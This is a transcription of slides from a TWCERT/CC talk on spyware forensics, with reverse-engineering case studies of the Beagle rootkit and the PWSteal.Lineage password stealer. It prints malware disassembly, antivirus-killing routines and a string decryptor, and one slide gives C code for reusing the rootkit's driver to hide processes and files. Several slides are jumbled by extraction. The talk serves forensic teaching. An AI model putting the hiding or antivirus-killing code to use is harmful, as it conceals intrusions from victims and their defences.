Spyware Forensic With Reversing and Static Analysis PK TWCERT/CC

Transcription

1 Spyware Forensic With Reversing and Static Analysis PK TWCERT/CC

2 Abstract 目 前 危 害 個 人 機 密 資 料 系 統 安 全 的 惡 意 程 式, 以 各 種 方 式 無 孔 不 入 的 進 入 我 們 電 腦, 當 我 們 上 網 下 載 程 式 接 收 電 子 郵 件 等, 往 往 會 遇 到 不 知 檔 案 是 否 為 惡 意 程 式, 但 防 毒 軟 體 也 未 出 現 警 告 的 情 況, 在 這 場 我 們 會 講 解 一 些 案 例 以 及 介 紹 靜 動 態 分 析 未 知 程 式 的 技 巧 About PK TWCERT/CC- 鑑 識 實 務 班 講 師 Mail: pk46(at)aptg.net 2

3 Outline Computer Forensics Why Spyware Forensics Reverse Code Engineering Anti-Reversing Spyware Reversing Conclusion 3

4 Computer Forensics What is Computer Forensics? Forensics Process Overview 4

5 Computer Forensics DEFINITION: 電 腦 鑑 識 是 一 種 運 用 專 業 的 分 析 與 調 查 技 術, 將 可 能 成 為 證 據 的 資 料 ( 又 稱 數 位 證 據 ) 進 行 收 集 鑑 別 分 析 與 保 存 的 一 個 過 程, 用 以 呈 現 於 法 院 狹 義 的 說 就 是 從 電 腦 安 全 事 件 發 生 後, 所 進 行 的 一 系 列 尋 找 數 位 證 據 的 活 動 數 位 證 據 為 任 何 可 能 的 資 訊, 並 能 夠 以 二 進 位 ( 數 位 ) 的 方 式 傳 輸 或 儲 存, 包 括 : 網 路 封 包 數 位 照 片 電 子 郵 件 記 憶 體 資 料 等 5

6 Forensics Process Overview Acquisition( 收 集 ) Live Data Collection (Volatile/Non- Volatile) Collecting Network-based Evidence Preservation( 保 存 ) Forensics Duplication Evidence Handling (Hash Tag) Identification( 鑑 定 ) Forensic Analysis Investigation Windows/Unix System Analyzing Network Traffic Evaluation( 評 估 ) Forensic Intuition/Sense Presentation( 呈 現 ) Writing Computer Forensic Report DFWS,2002 6

7 Why Spyware Forensics Rogue Web Sites Rogue Application Spyware Forensic 7

8 Rogue, Bad Guy :// Rogue Web Sites 哪 裡 有 流 氓 網 站? 有 多 流 氓? 你 是 否 知 道 自 己 上 的 是 流 氓 網 站? Rogue Application 我 的 電 腦 怪 怪 的, 但 是 我 又 不 知 道 發 生 了 何 事? 而 我 的 防 毒 軟 體 也 並 沒 有 出 現 任 何 異 狀 或 警 訊! 電 腦 資 源 始 終 用 不 夠? 難 道 我 的 電 腦 有 怪 獸? 還 是 小 馬? 8

9 Spyware Forensics DEFINITION: Spyware Forensics 算 是 Computer Forensics 的 一 環, 主 要 針 對 一 些 未 知 檔 案 或 是 程 式 的 鑑 定 分 析, 當 我 們 進 行 一 些 電 腦 安 全 事 件 調 查 時, 如 :Hacking: Case,, 可 能 會 遇 到 駭 客 所 部 署 的 惡 意 程 式, 此 時 我 們 就 必 須 手 動 的 鑑 別 出 這 些 檔 案 並 對 其 分 析 的 過 程 稱 為 Spyware Forensics 或 稱 Malware Forensics Perform Static Analysis of Spyware Reviewing the ASCII and Unicode strings Disassembling Code Determining the Type of File PE/NE/ELF/COFF Perform Dynamic Analysis of Spyware Debugging Monitoring (Create the Sandbox Environment) Perform Online Research Determine if the tool is publicly available on computer security or hacker sites. Perform Source Code Review If you either have the source code or believe you have identified the source code via online research. 9

10 Reverse Code Engineering What is RCE Type Of RCE Reversing Tools 10

11 What is RCE Reverse engineering (RE) Reverse Engineering is the process of analyzing a subject system to create representations of the system at a higher level of abstraction. The process of discovering the technological principles of a mechanical application through analysis of its structure, function and operation. Reverse Code Engineering (RCE) RCE can be defined as analyzing and disassembling a software system in order understand its design, components, and innerworkings. RCE also allows us to see hidden behaviors that cannot be directly observed by running the program or those actions that have yet to be activated. 11

12 Types Of RCE Security-Related Reversing Malicious Software Reversing Cryptographic Algorithms Digital Rights Management Auditing Program Binaries Reversing in Software Development Achieving Interoperability with Proprietary Software Developing Competing Software Evaluating Software Quality and Robustness 12

13 Reversing Tools Hex Editors UltraEdit Hex Workshop WinHex Disassemblers IDA Pro W32DASM Decompilers DeDe DJ Decompiler Debuggers OllyDbg Soft-ICE System Monitors API Monitor FileMon RegMon PE Tools PEiD PEDitor LoadPE 13

14 Anti-Reversing Eliminating Symbolic Information Obfuscating the Program Embedding Anti-debugger Code Code Encryption 14

15 Anti-Reversing Eliminating Symbolic Information Clear Symbol Name Export Functions by Ordinals Obfuscating the Program Junk code Virtual Machine Embedding Anti-debugger Code isdebuggerpresent API CreateFIleA API Code Encryption Simple XOR/ADD Encryption Packer and Protector Packing Unpacking 15

16 Code Encryption Simple XOR/ADD Encryption A xor 0 =A A xor B =C A xor C =B Packer and Protector Win32 Packer ASPack PECompact UPX FSG Petite PE-PACK Win32 Protector: ASProtect ACProtect Armadillo EXECryptor EXE Stealth FoxLock Krypton telock SDProtector Themida VMProtect Xtreme-Protector ~Advantages~ 1) The physical file size is usually smaller. 2) Resistant to the cracker. 3) Resistant to pattern-based Anti-Virus program. 16

17 What is Packing ( 加 殼 )? Unpack stub Unpack stub When Execution Unpack stub Unpack stub When decompress ok jump to OEP PE File PE File packing PE File PE File PE Loader PE File PE File decompress PE File PE File Hard Disk Reducing Size Hard Disk Memory Increasing Size Memory 17

18 UnPacking ( 脫 殼 ) Automatic Unpacking Auto unpacking tools Manual Unpacking 1. Open Debugger and load PE File. 2. Trace program to find OEP (Original Entry Point) 1. OepFinder 2. ESP Principle 3. Manual Trace 3. Dump Process to disk 4. Rebuild IAT (Import Address Table) 5. Rebuild PE Demo 18

19 Spyware Reversing Spyware Reversing Methodology Case Study W32.Beagle.XX(NTRootKit-W) PWSteal.Lineage 19

20 Spyware Reversing Methodology (6 Step) Step 5 Decrypt String String Revealing the Source Code Algorithm Reconstruction Step 1 Step 2 Step 3 Step 4 String String Analysis PE PE Analysis Disassembling Debugging Step 6 Run&Monitoring Dos Stub Strange Keyword File Name Strange URL Strange IP Registry Key Strange Packer Check Unpacking API Name BindPEAnalysis Prog Mechanism Function xref String xfef Import Function Export Function Program Algorithm File Process Registry Network 20

21 Case Study W32.Beagle.XX(NTRootKit NTRootKit-W) Spyware Analysis Spyware Exploit PWSteal.Lineage Spyware Analysis Spyware Exploit 21

22 Case 1:W32.Beagle.XX( 1 W32.Beagle.XX(NTRootKit-W) 功 能 : 此 Rootkit 通 常 跟 隨 Beagle 病 毒 一 起 流 竄, 受 感 染 的 電 腦 會 去 指 定 的 網 站 (100 多 種 ) 下 載 副 檔 名 為.jpg 的 執 行 檔 ( 事 實 是 上 是 執 行 檔 ), 並 會 搜 集 感 染 電 腦 中 的 通 訊 錄 並 寄 發 Zip 過 的 惡 意 程 式 此 Spyware 具 有 SMTP 引 擎 能 夠 構 造 格 式 主 動 發 信, 不 必 依 賴 SMTP Server, 直 接 用 被 感 染 電 腦 發 信 m_hook.sys 在 Kernel Mode, 具 抵 抗 防 毒 軟 體 能 力 態 樣 : 屬 不 請 自 來 型, 收 到 以 下 Mail 的 人 通 常 是 你 的 已 經 被 獲 取 了 Received: from austin.net ( hinet-ip.hinet.net [ ]) 22

23 W32.Beagle.XX(NTRootKit NTRootKit-W) W)-Analysis Flow Spyware jrcdgmmjdol.exe Step Files Stage Stage 1 String Analysis PE File Analysis jrcdgmmjdol.exe Step 1 Step 2 Stage Stage 2 String Analysis PE File Analysis beagle_ext1.exe beagle_ext2.exe (Driver) Step 1 Step 2 Stage Stage 3 Disassembling beagle_ext1.exe beagle_ext2.exe (Driver) Step 3 23

24 W32.Beagle.XX-Static Analysis-Stage 1 Step 1: String analysis jrcdgmmjdol.exe DOS Stub:Not Found! Strange Keyword:Not Found! FileName:kernel32.dll Step 2: PE file analysis Packer Check:Not Found! API Name:LoadLibraryA GetProcAddress Unpacking:jrcdgmmjdol.exe->un_jrcdgmmjdol.exe BindPEAnalysis:Extract 2 PE Files (beagle_ext1.exe beagle_ext2.exe) Go To Stage 2 24

25 W32.Beagle.XX-Static Analysis-Stage HELO %s.net 2 HELO %s.org Step 1: String analysis beagle_ext1.exe RSET beagle_ext2.exe MAIL FROM:<%s> Beagle_ext1.exe RCPT TO:<%s> DOS Stub:Not Found! DATA.zip Strange Keyword: image/gif Date: %s FileName:temp.zip error.gif To: "%s" <%s> Strange IP: From: "%s" <%s> Subject: %s Strange URL: Message-ID: <%s%s> MIME-Version: 1.0 Beagle_ext2.exe DOS Stub:!This program cannot be run in Content-Type: DOS mode text/html; charset="us-ascii" Strange Keyword:\Device\m_hook \DosDevices\m_hook Content-Type: application/octet-stream; (IsDriver name="%s%s"?) KeServiceDescriptorTable Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="%s%s" FileName:c:\reliz\driver_rootkit2\driver\m_hook.pdb ntoskrnl.exe Step 2: PE file analysis Beagle_ext2.exe (Is Driver?) Packer Check:Not Found! <br>password - <img src="cid:%s.%s"><br> API Name:PsSetLoadImageNotifyRoutine ZwQueryInformationFile ZwQueryDirectoryFile ZwEnumerateKey ZwUnmapViewOfSection BindPEAnalysis:Not Found! Go To Stage 3 deflate Copyright Jean-loup Gailly drv_st_key \hidn \hidn1.exe m_hook.sys m_hook google.com HELO %s.com Content-Type: multipart/mixed; boundary=" %s" %s Content-Transfer-Encoding: 7bit %s <br>the password is <img src="cid:%s.%s"><br> <br>password -- <img src="cid:%s.%s"><br> <br>use password <img src="cid:%s.%s"> to open archive.<br> <br>password is <img src="cid:%s.%s"><br> <br>zip password: <img src="cid:%s.%s"><br> <br>archive password: <img src="cid:%s.%s"><br> <br>password: <img src="cid:%s.%s"><br> %s Content-Type: %s; name="%s.%s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="%s.%s" Content-ID: <%s.%s> <img src="cid:%s.%s"><br> %s-- <br> <html><body> </body></html> 25

26 W32.Beagle.XX-Static Analysis-Stage 3 Step 3:Disassembling 3 - beagle_ext1.exe 26

27 W32.Beagle.XX-Static Analysis-Stage 3(Count.) Step 3:Disassembling 3 - beagle_ext1.exe (Startup Driver) 27

28 W32.Beagle.XX-Exploit Spyware Reuse Rootkit: //SSDT Hook #define IOCTL_M_HOOK_1 \ CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_READ_ACCESS+FILE_WRITE_ACCESS) ACCESS+FILE_WRITE_ACCESS) //Hidden Process #define IOCTL_M_HOOK_2 \ CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_BUFFERED, FILE_READ_ACCESS+FILE_WRITE_ACCESS) ACCESS+FILE_WRITE_ACCESS) //Hidden Directory #define IOCTL_M_HOOK_3 \ CTL_CODE(FILE_DEVICE_UNKNOWN, 0x803, METHOD_BUFFERED, FILE_READ_ACCESS+FILE_WRITE_ACCESS) ACCESS+FILE_WRITE_ACCESS) //Registry #define IOCTL_M_HOOK_5 \ CTL_CODE(FILE_DEVICE_UNKNOWN, 0x805, METHOD_BUFFERED, FILE_READ_ACCESS+FILE_WRITE_ACCESS) ACCESS+FILE_WRITE_ACCESS) char *tmp* tmp[]={" []={"notepad.exe","regedit.exe","calc.exe","hit2006","cmd.exe","nod32krn.exe","kav.exe"}; // File Process Registry DeviceIoControl(hFile,IOCTL_M_HOOK_2,tmp[2], sizeof(tmp),null,0,&bytesreturned,null);// &BytesReturned,NULL);//process DeviceIoControl(hFile,IOCTL_M_HOOK_3,tmp[0], sizeof(tmp),null,0,&bytesreturned,null);// &BytesReturned,NULL);//directorydirectory DeviceIoControl(hFile,IOCTL_M_HOOK_5,szWideProgID, sizeof(szwideprogid),null,0,&bytesreturned,null) //registry DeviceIoControl(hFile,IOCTL_M_HOOK_7,tmp[5], sizeof(tmp),null,0,&bytesreturned,null);//anti &BytesReturned,NULL);//anti-virus prog DeviceIoControl(hFile,IOCTL_M_HOOK_1,NULL,0,NULL,0,&BytesReturned,NULL); DEMO 28

29 Case 2:PWSteal.Lineage2 功 能 : 紀 錄 使 用 者 IE 連 線 與 線 上 遊 戲 帳 號 及 密 碼, 並 傳 送 到 指 定 的 態 樣 : 多 從 即 時 通 訊 軟 體 發 送 類 似 如 下 的 訊 息 : 未 來 的 人 類 生 活, 是 甚 麼 模 樣? 日 本 東 京 科 學 博 物 館, 就 把 將 在 未 來 幾 10 年 內, 走 進 人 類 生 活 的 科 技, 做 了 完 整 展 示 好 久 沒 上 線 拉, 最 近 還 好 嗎? 一 上 線 就 看 見 到 這 個 是 你 發 的 嗎? 粉 好 耶! 謝 謝 喔! 29

30 Spyware PWSteal.Lineage-Analysis Flow diany.scr Stage Stage 1 Step String Analysis PE File Analysis Files diany.scr Step 1 Step 2 Stage 2 String Analysis PE File Analysis Lineage_ext1.exe Lineage_ext2.exe Step 1 Step 2 Stage Stage 3 String Analysis PE File Analysis Lineage_Unext2.exe Lineage_ext3.exe Step 1 Step 2 Stage Stage 4 Disassembling diany.scr Step 3 Stage Stage 5 Debugging Lineage_Unext2.exe Step 4 Stage Stage 6 Decrypt String String Analysis Lineage_Unext2.exe Lineage_ext3.exe Step 5 Step 1 Stage Stage 7 Run&Monitoring diany.scr Step 6 30

31 PWSteal.Lineage-Static Static Analysis-Stage 1 Step 1: String analysis diany.scr DOS Stub:MZ This program must be run under Win32 Strange Keyword:EXEpack Adobe Photoshop 7.0(2006:05:08 14:01:31) FileName:1.exe ttt.jpg Step 2: PE file analysis Packer Check:Borland Delphi [Overlay] API Name:WriteFile ReadFIle ShellExecuteA CreateProcessA BindPEAnalysis:Extract 2 PE Files (Lineage_ext1.exe Lineage_ext2.exe) Go To Stage 2 31

32 PWSteal.Lineage-Static Static Analysis-Stage 2 Step 1: String analysis Lineage_e Lineage_ext1.exe Lineage_ext2.exe DOS Stub: Lineage_ext1.exe:MZP This program must be run under Win32 Strange Keyword: Lineage_ext1.exe:SOFTWARE\Borland\Delphi\RTL EXEpack Lineage_ext2.exe:ByDwing FileName: Lineage_ext1.exe:.jpg.bmp.EXE Step 2: PE file analysis Packer Check: Lineage_ext1.exe:Borland Delphi Lineage_ext2.exe:Upack beta -> Dwing Unpacking:Lineage_ext2.exe -> Lineage_Unext2.exe BindPEAnalysis:Lineage_Unext2.exe Extract 1 File (Lineage_ext3.exe) Go To Stage 3 32

33 PWSteal.Lineage-Static Static Analysis-Stage 3 Step 1: String analysis Lineage_ext3.exe send send -connect ehlo vip Lineage_ext3.exe :This program must be run under Win32 Rset MAIL FROM: RCPT TO: < Lineage_ext3.exe:tbMainAccountID tbmainaccountpassword DATA tbpasswordhint tbgoodlockid Message-Id: <[email protected]> From: To: Lineage_ext3.exe:J_.EXE d1.dat d2_.exe PDLL.dll Subject: X-Mailer: <FOXMAIL 4.0> MIME-Version: 1.0 Content-Type: text/html; charset="gb2312" QUIT HELO auth LOGIN MAIL FROM: RCPT TO: < Lineage_Unext2.exe:CreateToolhelp32Snapshot Process32First Process32Next DATA Message-Id: <[email protected]> Lineage_ext3.exe:SetWindowsHookExA UnhookWindowsHookEx From: Lineage_ext3.exe:2 Export Function->JSta JStb To: (IsDll?) Subject: X-Mailer: <FOXMAIL 4.0> MIME-Version: 1.0 Content-Type: text/html; charset="gb2312" 33 QUIT DOS Stub: Strange Keyword: FileName: Step 2: PE file analysis Packer Check: Lineage_ext3.exe:Not a valid PE file (Why?) API Name: BindPEAnalysis:None Go To Stage 4

34 CODE:00403FAE mov PWSteal.Lineage-Static Static CODE:00403FB3 Analysis-Stage mov 4 Step 3:Disassembling 3 -diany.scr diany.src is a Dropper CODE:00403E39 mov ecx, 2 ; dwmovemethod CODE:00403E3E mov edx, 0FFFFF6B4h ; ldistancetomove CODE:00403E43 mov eax, [ebp+hfile] ; hfile CODE:00403E46 call FileSeek(int,int,int) CODE:00403E4B lea edx, [ebp+var_896c] ; lpbuffer CODE:00403E51 mov ecx, 94Ch ; nnumberofbytestoread CODE:00403E56 mov eax, [ebp+hfile] ; hfile CODE:00403E59 call sub_403c6c CODE:00403E5E cmp eax, 94Ch CODE:00403E63 jnz loc_40421c CODE:00403E69 lea eax, [ebp+var_896c] CODE:00403E6F mov edx, offset aexepack ; "EXEpack" CODE:00403E74 xor ecx, ecx CODE:00403E76 mov cl, [eax] CODE:00403E78 inc ecx CODE:00403E79 call AStrCmp(void).. ttt.jpg. Open: Open: ttt.jpg ttt.jpg. CODE: push eax ; lpfile CODE: push ; lpoperation CODE: C Open: Open: 1.exe 1.exepush 0 ; hwnd CODE: E call ShellExecuteA CODE:00403FA6 loc_403fa6: CODE:00403FA6 mov eax, [ebp+var_1c] CODE:00403FA9 mov eax, [eax] CODE:00403FAB sub [ebp+ldistancetomove], eax ecx, 2 ; dwmovemethod edx, [ebp+ldistancetomove] CODE:00403FB6 mov eax, [ebp+hfile] ; hfile CODE:00403FB9 call FileSeek(int,int,int) CODE:00403FBE lea eax, [ebp+var_8988] CODE:00403FC4 mov edx, [ebp+var_20] CODE:00403FC7 call unknown_libname_11 ; Dropping CODE:00403FCC ttt.jpgmov ecx, [ebp+var_8988] CODE:00403FD2 lea eax, [ebp+var_8984] CODE:00403FD8 mov edx, [ebp+var_14] CODE:00403FDB call LStrCat3(void) CODE:00403FE0 mov eax, [ebp+var_8984] CODE:00403FE6 call FileCreate(System::AnsiString) CODE:00403FEB mov [ebp+hobject], eax CODE:00403FEE cmp [ebp+hobject], 0FFFFFFFFh CODE:00403FF2 jz short loc_ CODE:00403FF4 xor edx, edx CODE:00403FF6 push ebp CODE:00403FF7 push offset loc_40404e Dropping Dropping 1.exe 1.exe CODE:00403FFC push dword ptr fs:[edx] CODE:00403FFF mov fs:[edx], esp CODE: CODE: loc_404002: CODE: mov eax, [ebp+var_1c] Dropping ttt.jpg CODE: mov eax, [eax] CODE: mov edx, 8000h CODE: C call sub_ CODE: mov ecx, eax ; nnumberofbytestoread CODE: lea edx, [ebp+buffer] ; lpbuffer CODE: mov eax, [ebp+hfile] ; hfile CODE: C call sub_403c6c CODE: mov ebx, eax CODE: mov eax, [ebp+var_1c] CODE: sub [eax], ebx CODE: lea edx, [ebp+buffer] ; lpbuffer CODE: E mov ecx, ebx ; nnumberofbytestowrite CODE: mov eax, [ebp+hobject] ; hfile CODE: call sub_403c38 CODE: test ebx, ebx CODE: A jz short loc_ CODE: C mov eax, [ebp+var_1c] CODE: F cmp dword ptr [eax], 0 CODE: jnz short loc_

35 PWSteal.Lineage-Dynamic Analysis-Stage 5 Step 4:Debugging 4 Lineage_ Lineage_UnExt2.exe Decrypt Decrypt Routine Routine D > /8B45 FC /mov eax, [ebp-4] B55 F8 mov edx, [ebp-8] A5C10 FF mov bl, [eax+edx-1] C3 80 add bl, A. 8D45 F4 lea eax, [ebp-c] D. 8BD3 mov edx, ebx F. E8 84EEFFFF call D B55 F4 mov edx, [ebp-c] BC7 mov eax, edi E8 DAEEFFFF call E. FF45 F8 inc dword ptr [ebp-8] E dec esi ^\75 D9 \jnz short D RavMonClass RavMon.exe EGHOST.EXE MAILMON.EXE KAVPFW.EXE IPARMOR.EXE Ravmond.EXE KVXP.KXP KVMonXP.KXP KRegEx.exe 江 民 殺 毒 Decrypted Decrypted Strings Strings Close Close Prog ProgWindow Enum EnumAnti-Virus 00404B5D. 50 push eax ; /ProcessId 00404B5E. 6A FF push -1 ; Inheritable = TRUE 00404B60. 6A 01 push 1 ; Access = TERMINATE 00404B62. E8 6DEFFFFF call <jmp.&kernel32.openprocess> 00404B67. 8BD8 mov ebx, eax 00404B69. 85DB test ebx, ebx 00404B6B je short 00404B B6D. 6A 00 push 0 ; /ExitCode = B6F. 53 push ebx ; hprocess 00404B70. E8 77EFFFFF call <jmp.&kernel32.terminateprocess> 00404B75. 83F8 01 cmp eax, B78. 1BC0 sbb eax, eax 00404B7A. 40 inc eax 00404B7B FB mov [ebp-5], al 00404B7E. 53 push ebx ; /hobject 00404B7F. E8 60EEFFFF call <jmp.&kernel32.closehandle> 00404C5E. 50 push eax ; Class 00404C5F. E8 A8EEFFFF call <jmp.&user32.findwindowa> 00404C64. 6A 00 push 0 ; /lparam = C66. 6A 00 push 0 ; wparam = C68. 6A 10 push 10 ; Message = WM_CLOSE 00404C6A. 50 push eax ; hwnd 00404C6B. E8 ACEEFFFF call <jmp.&user32.sendmessagea> 35

36 PWSteal.Lineage-Static Static Analysis-Stage 5(Count.) C645 DF 4D mov byte ptr [ebp-21], 4D 00405B push eax ; /FileName Dropping. 6A PDLL.Dll 00 push 0 ; /poverlapped = NULL 00405B37. E8 70DFFFFF call <jmp.&kernel32.loadlibrarya> Dropping. 8D45 PDLL.Dll E0 lea eax, [ebp-20] 00405B3C. 8BD8 mov ebx, eax push eax ; pbyteswritten 00405B3E Loading 85DB PDLL.Dll test ebx, ebx A. 6A 01 push 1 ; nbytestowrite = B40. 0F84 A je 00405CEB C. 8D45 DF lea eax, [ebp-21] 00405B46. 8D95 C0F7FFFF lea edx, [ebp-840] F. 50 push eax ; Buffer 00405B4C. B mov eax, push ebx ; hfile 00405B51. E8 A2E7FFFF call F E8 7EF8FFFF call <jmp.&kernel32.writefile> 00405B56. 8B85 C0F7FFFF mov eax, [ebp-840] A 00 push 0 ; /poverlapped = NULL 00405B5C. E8 CFD8FFFF call D45 E0 lea eax, [ebp-20] 00405B push eax ; /ProcNameOrOrdinal B. 50 push eax ; pbyteswritten 00405B push ebx ; hmodule C. 8B45 F8 mov eax, [ebp-8] 00405B63. E8 1CDFFFFF call <jmp.&kernel32.getprocaddres F. 48 dec eax push eax ; nbytestowrite 00405C push eax B45 FC mov eax, [ebp-4] 00405C42. FFD7 call edi // Call Export Function inc eax ; UnExt3.0040D1AC push eax ; Buffer push ebx ; hfile 00405C58 > /8B06 mov eax, [esi] E8 68F8FFFF call <jmp.&kernel32.writefile> Kill Kill Process Process Loop Loop C. EB 14 jmp short A C72. E8 9DDEFFFF call <jmp.&user32.peekmessagea> E > 6A 00 push 0 ; /poverlapped = NULL D45 E0 lea eax, [ebp-20] 00405C8B. E8 94DEFFFF call <jmp.&user32.translatemessage> push eax ; pbyteswritten 00405C90. 8D85 D3FBFFFF lea eax, [ebp-42d] B45 F8 mov eax, [ebp-8] 00405C push eax ; /pmsg push eax ; nbytestowrite 00405C97. E8 68DEFFFF call <jmp.&user32.dispatchmessagea> B45 FC mov eax, [ebp-4] 00405C9C 68 E push 3E8 ; /Timeout = ms B. 50 push eax ; Buffer 00405CA1. E8 3EDEFFFF call <jmp.&kernel32.sleep> C. 53 push ebx ; hfile 00405CA6. 8B06 mov eax, [esi] D. E8 52F8FFFF call <jmp.&kernel32.writefile> 00405CA8. FF inc dword ptr [eax+1119] A2 > 53 push ebx ; /hobject 00405CAE. E8 65EFFFFF call 00404C18 //Kill Process Loop A3. E8 3CF7FFFFcall <jmp.&kernel32.closehandle> 00405CB3. EB A3 jmp short 00405C58

37 PWSteal.Lineage-Static Static Analysis-Stage 6 Step 5:Decrypt 5 Strings Lineage_ Lineage_UnExt2.exe Decryption Routine buffer[i] = (buffer[i]+0x80) & 0xFF ; Extract Strings and GoTo Setp 1 Step 1: String Analysis-- --Lineage_ Lineage_UnExt2.exe Strange Keyword: RegisterServiceProcess Mapfile URLDownloadToFileA (API) FileName: RavMon.exe EGHOST.EXE MAILMON.EXE KAVPFW.EXE IPARMOR.EXE Ravmond.EXE KVXP.KXP KVMonXP.KXP KRegEx.exe PDLL.dll Internat.exe svchost.exe rundll32.exe URLMON.DLL wininit.ini Registry Key: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit URL: [email protected] 37

38 PWSteal.Lineage-Static Static Analysis-Stage 6(Count.) Step 5:Decrypt 5 Strings Lineage_ Lineage_Ext3.exe Decryption Routine buffer[i] = (buffer[i]+0x80) & 0xFF ; Extract Strings and GoTo Setp 1 Step 1: String analysis tbmainaccountid tbpersonalid tbmainaccountpassword tbserviceaccountid tboldpassword tbnewpassword lbservicetitle Strange Keyword: X_tbPassword FileName:c:\gameab1.txt c:\abc1. IEXPLORE.EXE wsock32.dll Registry Key: LiTo Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ddldelaytime Internet Explorer_Server Lineage serverlistwnd Windows Client Strange URL: IEFrame socket connect WSAStartup gethostname gethostbyname inet_ntoa WSACleanup inet_addr send htons closesocket recv Strange [email protected] 38

39 PWSteal.Lineage-Dynamic Analysis-Stage 7 Step 6:Run 6 & Monitoring (DEMO) svchost.exe svchost.exe 0 taskmgr.exe taskmgr.exe 0 Explorer.EXE Explorer.EXE 0 svchost.exe svchost.exe 0 taskmgr.exe taskmgr.exe 0 Explorer.EXE Explorer.EXE U:ccc U:ccc Internet Explorer_Server Internet Explorer_Server

40 Conclusion 網 路 上 充 斥 著 許 多 流 氓 網 站, 有 些 外 表 看 起 來 相 當 的 中 規 中 矩, 但 葫 蘆 裡 賣 假 藥, 行 釣 魚 之 實, 使 用 者 於 網 路 上 下 載 檔 案, 一 時 不 查, 都 有 可 能 吃 到 魚 鉤 目 前 間 諜 軟 體 流 行 檔 案 綑 綁 技 術, 一 個 檔 案 內 不 管 是 Office 檔 圖 片 檔 影 像 檔 等 都 有 可 能 搭 配 精 心 設 計 的 ShellCode 與 Spyware 一 同 放 置 於 一 個 檔 案 內, 這 時 我 們 必 須 需 學 習 些 分 析 技 術, 萃 取 出 相 關 檔 案 分 析, 因 為 光 靠 防 毒 軟 體 阻 擋 是 很 非 常 薄 弱 的 本 次 作 者 於 會 中 提 出 一 針 對 Spyware 的 逆 向 方 法 (6 Step),, 藉 由 這 個 流 程 實 際 的 分 析 了 兩 個 流 行 的 Spyware,, 並 根 據 所 找 尋 出 的 線 索 來 判 對 該 程 式 是 否 為 惡 意 程 式, 藉 以 證 明 其 適 用 性 希 望 能 夠 讓 與 會 的 朋 友 更 了 解 目 前 Spyware 的 手 法 及 方 式, 以 及 提 供 各 位 一 些 自 行 分 析 的 方 式 40

41 Thank You 41